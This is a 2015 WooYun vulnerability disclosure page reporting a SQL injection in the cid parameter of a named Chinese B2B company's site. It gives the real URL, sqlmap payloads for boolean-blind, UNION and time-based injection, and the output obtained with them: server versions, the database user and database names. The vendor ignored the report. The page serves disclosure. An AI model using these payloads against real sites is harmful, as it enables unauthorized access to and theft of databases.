当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150612

漏洞标题:北京铭万智达B2B某站站布尔型SQL注入(伪静态)

相关厂商:北京铭万智达科技有限公司

漏洞作者: 路人甲

提交时间:2015-10-31 10:12

修复时间:2015-11-05 10:14

公开时间:2015-11-05 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-31: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点是个静态的

http://corp.b2b.cn/category/Category/index/cid/321


来转变构造一下cid参数

http://corp.b2b.cn/category/Category/index?cid=321


布尔型注入

Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=321) AND 5583=5583 AND (8280=8280
Type: UNION query
Title: MySQL UNION query (NULL) - 30 columns
Payload: cid=321) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6470733a,0x6d6f45624e75485a4153,0x
7a3a), NULL, NULL, NULL, NULL# AND (1430=1430
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=321) AND SLEEP(5) AND (3244=3244
---
[13:54:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.4.5
back-end DBMS: MySQL 5.0.11
[13:54:41] [INFO] fetching current user
current user: 'db290@%'


数据库3裤

available databases [3]:
[*] dd20141204093045995
[*] information_schema
[*] test


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-05 10:14

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无